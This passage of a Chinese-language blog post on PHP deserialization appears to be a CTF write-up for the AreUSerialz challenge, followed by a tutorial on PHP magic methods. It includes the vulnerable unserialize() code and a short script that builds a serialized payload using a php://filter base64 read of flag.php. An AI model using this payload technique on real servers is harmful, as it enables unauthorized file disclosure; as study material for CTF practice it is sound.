&quot;/tmp/tmpfile&quot;;</span><br><span class="line">        $content = &quot;Hello World!&quot;;</span><br><span class="line">        $this-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function process() &#123;</span><br><span class="line">        if($this-&gt;op == &quot;1&quot;) &#123;</span><br><span class="line">            $this-&gt;write();</span><br><span class="line">        &#125; else if($this-&gt;op == &quot;2&quot;) &#123;</span><br><span class="line">            $res = $this-&gt;read();</span><br><span class="line">            $this-&gt;output($res);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;output(&quot;Bad Hacker!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function write() &#123;</span><br><span class="line">        if(isset($this-&gt;filename) &amp;&amp; isset($this-&gt;content)) &#123;</span><br><span class="line">            if(strlen((string)$this-&gt;content) &gt; 100) &#123;</span><br><span class="line">                $this-&gt;output(&quot;Too long!&quot;);</span><br><span class="line">                die();</span><br><span class="line">            &#125;</span><br><span class="line">            $res = file_put_contents($this-&gt;filename, $this-&gt;content);</span><br><span class="line">            if($res) $this-&gt;output(&quot;Successful!&quot;);</span><br><span class="line">            else $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function read() &#123;</span><br><span class="line">        $res = &quot;&quot;;</span><br><span class="line">        if(isset($this-&gt;filename)) &#123;</span><br><span class="line">            $res = file_get_contents($this-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">        return $res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function output($s) &#123;</span><br><span class="line">        echo &quot;[Result]: &lt;br&gt;&quot;;</span><br><span class="line">        echo $s;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        if($this-&gt;op === &quot;2&quot;)</span><br><span class="line">            $this-&gt;op = &quot;1&quot;;</span><br><span class="line">        $this-&gt;content = &quot;&quot;;</span><br><span class="line">        $this-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function is_valid($s) &#123;</span><br><span class="line">    for($i = 0; $i &lt; strlen($s); $i++)</span><br><span class="line">        if(!(ord($s[$i]) &gt;= 32 &amp;&amp; ord($s[$i]) &lt;= 125))</span><br><span class="line">            return false;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET&#123;&#x27;str&#x27;&#125;)) &#123;</span><br><span class="line"></span><br><span class="line">    $str = (string)$_GET[&#x27;str&#x27;];</span><br><span class="line">    if(is_valid($str)) &#123;</span><br><span class="line">        $obj = unserialize($str);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="新知识："><a href="#新知识：" class="headerlink" title="新知识："></a>新知识：</h3><p>1.我们可以直接构造一个新的序列，不用一个一个写</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">class FileHandler</span><br><span class="line">&#123;</span><br><span class="line"> </span><br><span class="line">    public $op = 2;</span><br><span class="line">    public $filename = &quot;php://filter/read=convert.base64-encode/resource=flag.php&quot;;</span><br><span class="line">    public $content;</span><br><span class="line"> </span><br><span class="line">&#125;</span><br><span class="line">$A=new FileHandler();</span><br><span class="line">$B=serialize($A);</span><br><span class="line">$B = str_replace(chr(0), &#x27;\00&#x27;, $B);</span><br><span class="line">$B = str_replace(&#x27;s:&#x27;, &#x27;S:&#x27;, $B);</span><br><span class="line">echo $B;</span><br></pre></td></tr></table></figure>

<p>2.<strong>利用php伪协议来读取</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php://filter/read=convert.base64-encode/resource=flag.php</span><br></pre></td></tr></table></figure>

<p>原因：在服务器中f<strong>ile_get_contents会读取文件并且执行</strong>，看到<strong>结尾有.php便会以php的方式执行代码</strong>，可是<strong>如果flag文件里面没有echo之类的输出函数，就无法输出</strong></p>
<p>如下函数：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$flag = &#x27;flag&#123;23122b16-3361-4524-829a-55503b6e8000&#125;&#x27;;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>所以用base64直接编码读取可以直接获取全部的文件内容。</p>
<h2 id="常见的魔术方程："><a href="#常见的魔术方程：" class="headerlink" title="常见的魔术方程："></a>常见的魔术方程：</h2><h3 id="1-construct"><a href="#1-construct" class="headerlink" title="1. __construct()"></a>1. <code>__construct()</code></h3><ul>
<li><strong>功能</strong>：构造函数，在创建对象时自动调用，用于初始化对象的属性。</li>
<li></li>
<li><strong>人话：类被使用就会被调用</strong></li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Person</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$name</span>;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$age</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$name</span>, <span class="variable">$age</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;name = <span class="variable">$name</span>;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;age = <span class="variable">$age</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$person</span> = <span class="keyword">new</span> <span class="title class_">Person</span>(<span class="string">&#x27;John&#x27;</span>, <span class="number">30</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$person</span>-&gt;name; <span class="comment">// 输出: John</span></span><br></pre></td></tr></table></figure>





<h3 id="2-destruct"><a href="#2-destruct" class="headerlink" title="2. __destruct()"></a>2. <code>__destruct()</code></h3><ul>
<li><strong>功能</strong>：析构函数，在对象被销毁时自动调用，通常用于释放对象占用的资源，如关闭文件、数据库连接等。</li>
<li></li>
<li><strong>人话：整体脚本结束时候调用</strong></li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">DatabaseConnection</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$conn</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;conn = <span class="keyword">new</span> <span class="title function_ invoke__">mysqli</span>(<span class="string">&#x27;localhost&#x27;</span>, <span class="string">&#x27;user&#x27;</span>, <span class="string">&#x27;password&#x27;</span>, <span class="string">&#x27;dbname&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="variable language_">$this</span>-&gt;conn) &#123;</span><br><span class="line">            <span class="variable language_">$this</span>-&gt;conn-&gt;<span class="title function_ invoke__">close</span>();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$db</span> = <span class="keyword">new</span> <span class="title class_">DatabaseConnection</span>();</span><br><span class="line"><span class="comment">// 当脚本执行结束或对象被显式销毁时，__destruct() 方法会被调用</span></span><br></pre></td></tr></table></figure>

<h3 id="3-toString"><a href="#3-toString" class="headerlink" title="3. __toString()"></a>3. <code>__toString()</code></h3><ul>
<li><strong>功能</strong>：当对象被当作字符串使用时自动调用，必须返回一个字符串。</li>
<li></li>
<li><strong>人话：被强制为echo输出时候调用</strong></li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Book</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$title</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"><span class="variable">$title</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;title = <span class="variable">$title</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;Book title: &quot;</span> . <span class="variable language_">$this</span>-&gt;title;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$book</span> = <span class="keyword">new</span> <span class="title class_">Book</span>(<span class="string">&#x27;PHP Programming&#x27;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$book</span>; <span class="comment">// 输出: Book title: PHP Programming</span></span><br></pre></td></tr></table></figure>

<h3 id="4-call"><a href="#4-call" class="headerlink" title="4. __call()"></a>4. <code>__call()</code></h3><ul>
<li><strong>功能</strong>：当调用一个对象中不存在的方法时自动调用，接收两个参数：方法名和参数数组。</li>
<li></li>
<li>人话：使用<em><strong>同一个类中</strong></em>不可访问的方法时候调用（<strong>比如私有和不存在的</strong>）</li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyClass</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__call</span>(<span class="params"><span class="variable">$method</span>, <span class="variable">$arguments</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Call to undefined method: <span class="subst">$method</span> with arguments: &quot;</span> . <span class="title function_ invoke__">implode</span>(<span class="string">&#x27;, &#x27;</span>, <span class="variable">$arguments</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyClass</span>();</span><br><span class="line"><span class="variable">$obj</span>-&gt;<span class="title function_ invoke__">unknownMethod</span>(<span class="string">&#x27;arg1&#x27;</span>, <span class="string">&#x27;arg2&#x27;</span>); <span class="comment">// 输出: Call to undefined method: unknownMethod with arguments: arg1, arg2</span></span><br></pre></td></tr></table></figure>

<h3 id="5-callStatic"><a href="#5-callStatic" class="headerlink" title="5. __callStatic()"></a>5. <code>__callStatic()</code></h3><ul>
<li><p><strong>功能</strong>：当调用一个类中不存在的静态方法时自动调用，接收两个参数：方法名和参数数组。</p>
</li>
<li></li>
<li><p>静态是什么？</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">使用static进行定义</span><br><span class="line">echo MathUtil::add(2, 3); // 输出：5</span><br><span class="line">::进行引用</span><br></pre></td></tr></table></figure>


</li>
<li></li>
<li><p><strong>示例</strong>：</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyStaticClass</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">__callStatic</span>(<span class="params"><span class="variable">$method</span>, <span class="variable">$arguments</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;Call to undefined static method: <span class="subst">$method</span> with arguments: &quot;</span> . <span class="title function_ invoke__">implode</span>(<span class="string">&#x27;, &#x27;</span>, <span class="variable">$arguments</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title class_">MyStaticClass</span>::<span class="title function_ invoke__">unknownStaticMethod</span>(<span class="string">&#x27;arg1&#x27;</span>, <span class="string">&#x27;arg2&#x27;</span>); <span class="comment">// 输出: Call to undefined static method: unknownStaticMethod with arguments: arg1, arg2</span></span><br></pre></td></tr></table></figure>

<h3 id="6-get"><a href="#6-get" class="headerlink" title="6. __get()"></a>6. <code>__get()</code></h3><ul>
<li><strong>功能</strong>：当访问一个对象中不存在或不可访问的属性时自动调用，接收一个参数：属性名。</li>
<li></li>
<li>人话：调用不存在的<strong>属性</strong>时候调用</li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$data</span> = [];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__get</span>(<span class="params"><span class="variable">$property</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">array_key_exists</span>(<span class="variable">$property</span>, <span class="variable">$this</span>-&gt;data)) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable language_">$this</span>-&gt;data[<span class="variable">$property</span>];</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="variable">$value</span> = <span class="variable">$obj</span>-&gt;nonExistentProperty; <span class="comment">// 会调用 __get() 方法</span></span><br></pre></td></tr></table></figure>

<h3 id="7-set"><a href="#7-set" class="headerlink" title="7. __set()"></a>7. <code>__set()</code></h3><ul>
<li><strong>功能</strong>：当给一个对象中<strong>不存在或不可访问的属性赋值</strong>时自动调用，接收两个参数：属性名和属性值。</li>
<li></li>
<li></li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$data</span> = [];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__set</span>(<span class="params"><span class="variable">$property</span>, <span class="variable">$value</span></span>) </span>&#123;</span><br><span class="line">        <span class="variable language_">$this</span>-&gt;data[<span class="variable">$property</span>] = <span class="variable">$value</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="variable">$obj</span>-&gt;newProperty = <span class="string">&#x27;new value&#x27;</span>; <span class="comment">// 会调用 __set() 方法</span></span><br></pre></td></tr></table></figure>

<h3 id="8-isset"><a href="#8-isset" class="headerlink" title="8. __isset()"></a>8. <code>__isset()</code></h3><ul>
<li><strong>功能</strong>：当使用 <strong><code>isset()</code> 函数检查一个对象中不存在或不可访问的属性</strong>时自动调用，接收一个参数：属性名。</li>
<li></li>
<li></li>
<li></li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$data</span> = [];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__isset</span>(<span class="params"><span class="variable">$property</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">isset</span>(<span class="variable language_">$this</span>-&gt;data[<span class="variable">$property</span>]);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="title function_ invoke__">var_dump</span>(<span class="keyword">isset</span>(<span class="variable">$obj</span>-&gt;nonExistentProperty)); <span class="comment">// 会调用 __isset() 方法</span></span><br></pre></td></tr></table></figure>

<h3 id="9-unset"><a href="#9-unset" class="headerlink" title="9. __unset()"></a>9. <code>__unset()</code></h3><ul>
<li><p><strong>功能</strong>：当使用 <strong><code>unset()</code> 函数删除</strong>一个对象中<strong>不存在或不可访问的属性</strong>时自动调用，接收一个参数：属性名。</p>
</li>
<li><p><strong>示例</strong>：</p>
</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyObject</span> </span>&#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="variable">$data</span> = [];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__unset</span>(<span class="params"><span class="variable">$property</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">array_key_exists</span>(<span class="variable">$property</span>, <span class="variable">$this</span>-&gt;data)) &#123;</span><br><span class="line">            <span class="keyword">unset</span>(<span class="variable language_">$this</span>-&gt;data[<span class="variable">$property</span>]);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj</span> = <span class="keyword">new</span> <span class="title class_">MyObject</span>();</span><br><span class="line"><span class="keyword">unset</span>(<span class="variable">$obj</span>-&gt;nonExistentProperty); <span class="comment">// 会调用 __unset() 方法</span></span><br></pre></td></tr></table></figure>

<h3 id="10-clone"><a href="#10-clone" class="headerlink" title="10. __clone()"></a>10. <code>__clone()</code></h3><ul>
<li><strong>功能</strong>：当使用 <code>clone</code> 关键字克隆一个对象时自动调用，用于自定义对象的克隆行为。</li>
<li><strong>示例</strong>：</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MyClass</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$value</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__clone</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// 可以在这里对克隆后的对象进行一些额外的处理</span></span><br><span class="line">        <span class="variable language_">$this</span>-&gt;value = <span class="variable language_">$this</span>-&gt;value * <span class="number">2</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$obj1</span> = <span class="keyword">new</span> <span class="title class_">MyClass</span>();</span><br><span class="line"><span class="variable">$obj1</span>-&gt;value = <span class="number">10</span>;</span><br><span class="line"><span class="variable">$obj2</span> = <span class="keyword">clone</span> <span class="variable">$obj1</span>;</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$obj2</span>-&gt;value; <span class="comment">// 输出: 20</span></span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      
      
      
      
      
      
      
      
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/pop%E9%93%BE/" rel="tag">pop链</a></li><li class="article-tag-list-item" data-aos="zoom-in"><a class="article-tag-list-link" href="/tags/%E7%BD%91%E5%AE%89/" rel="tag">网安</a></li></ul>


    </footer>
  </div>
  
    
  <nav id="article-nav" data-aos="fade-up">
    
      <div class="article-nav-link-wrap article-nav-link-left">
        
          
          
            <img data-src="/covers/ruime and sakuya.jpg" data-sizes="auto" alt="" class="lazyload">
          
        
        <a href="/2025/03/11/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B8%AD%E5%B8%B8%E8%A7%81%E7%9A%84%E9%AD%94%E6%9C%AF%E6%96%B9%E7%A8%8B/"></a>
        <div class="article-nav-caption">Newer</div>
        <h3 class="article-nav-title">
          
            (no title)
          
        </h3>
      </div>
    
    
    <div class="article-nav-link-wrap article-nav-link-right">
      
        
        
          <img data-src="/covers/reimu.webp" data-sizes="auto" alt="" class="lazyload">
        
      
      <a href="/2025/02/27/Easy%20MD5%E7%BB%95%E8%BF%87/"></a>
      <div class="article-nav-caption">Older</div>
      <h3 class="article-nav-title">
        
          (no title)
        
      </h3>
    </div>
    
  </nav>


  
</article>






</section>
          
            <aside id="sidebar">
  <div class="sidebar-wrapper wrap-sticky">
    <div class="sidebar-wrap" data-aos="fade-up">
      
        <div class="sidebar-toc-sidebar"><div class="sidebar-toc">
  <h3 class="toc-title">Contents</h3>
  <div class="sidebar-toc-wrapper toc-div-class" >
      
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%B3%E4%BA%8EPOP%E9%93%BE-Property-Oriented-Programming-Chain%EF%BC%89%EF%BC%9A"><span class="toc-number">1.</span> <span class="toc-text">关于POP链 (Property Oriented Programming Chain）：</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B3%E4%BA%8E%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.</span> <span class="toc-text">关于原生函数：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.1.</span> <span class="toc-text">常见的原生函数：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%8E%E4%B9%88%E5%88%A9%E7%94%A8%E5%8E%9F%E7%94%9F%E5%87%BD%E6%95%B0%EF%BC%9F%EF%BC%9A"><span class="toc-number">1.1.2.</span> <span class="toc-text">怎么利用原生函数？：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#array-walk%EF%BC%9A"><span class="toc-number">1.1.2.1.</span> <span class="toc-text">array_walk：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#%E5%8C%BF%E5%90%8D%E5%87%BD%E6%95%B0%EF%BC%9A"><span class="toc-number">1.1.2.1.1.</span> <span class="toc-text">匿名函数：</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9C%A8%E4%BB%94%E7%BB%86%E7%90%86%E8%A7%A3%E5%90%8E%E4%BE%BF%E5%8E%BB%E5%85%88%E5%81%9A%E4%BA%86%E7%82%B9%E7%AE%80%E5%8D%95%E7%9A%84%E9%A2%98%E7%9B%AE%EF%BC%9A-SWPUCTF-2021-%E6%96%B0%E7%94%9F%E8%B5%9B-pop"><span class="toc-number">2.0.1.</span> <span class="toc-text">在仔细理解后便去先做了点简单的题目：[SWPUCTF 2021 新生赛]pop</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#HZNUCTF-2023-preliminary-ppppop"><span class="toc-number">2.0.1.1.</span> <span class="toc-text">[HZNUCTF 2023 preliminary]ppppop</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz%EF%BC%88%E5%85%B6%E5%AE%9E%E8%BF%99%E4%B8%AA%E6%9C%AC%E6%9D%A5%E5%BA%94%E8%AF%A5%E6%94%BE%E5%9C%A8%E7%AC%AC%E4%B8%80%E4%B8%AA%E7%9A%84%EF%BC%8C%E5%BF%98%E8%AE%B0%E5%86%99%E4%BA%86%EF%BC%89"><span class="toc-number">2.0.1.2.</span> <span class="toc-text">[网鼎杯 2020 青龙组]AreUSerialz（其实这个本来应该放在第一个的，忘记写了）</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%96%B0%E7%9F%A5%E8%AF%86%EF%BC%9A"><span class="toc-number">2.0.2.</span> <span class="toc-text">新知识：</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E7%9A%84%E9%AD%94%E6%9C%AF%E6%96%B9%E7%A8%8B%EF%BC%9A"><span class="toc-number">2.1.</span> <span class="toc-text">常见的魔术方程：</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-construct"><span class="toc-number">2.1.1.</span> <span class="toc-text">1. __construct()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-destruct"><span class="toc-number">2.1.2.</span> <span class="toc-text">2. __destruct()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-toString"><span class="toc-number">2.1.3.</span> <span class="toc-text">3. __toString()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-call"><span class="toc-number">2.1.4.</span> <span class="toc-text">4. __call()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-callStatic"><span class="toc-number">2.1.5.</span> <span class="toc-text">5. __callStatic()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-get"><span class="toc-number">2.1.6.</span> <span class="toc-text">6. __get()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#7-set"><span class="toc-number">2.1.7.</span> <span class="toc-text">7. __set()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#8-isset"><span class="toc-number">2.1.8.</span> <span class="toc-text">8. __isset()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#9-unset"><span class="toc-number">2.1.9.</span> <span class="toc-text">9. __unset()</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#10-clone"><span class="toc-number">2.1.10.</span> <span class="toc-text">10. __clone()</span></a></li></ol></li></ol></li></ol>
      
  </div>
</div>
</div>
        <div class="sidebar-common-sidebar hidden"><div class="sidebar-author">
  <img data-src="/avatar/avatar.webp" data-sizes="auto" alt="Flight-star" class="lazyload">
  <div class="sidebar-author-name">Flight-star</div>
  <div class="sidebar-description"></div>
</div>
<div class="sidebar-state">
  <div class="sidebar-state-article">
    <div>Posts</div>
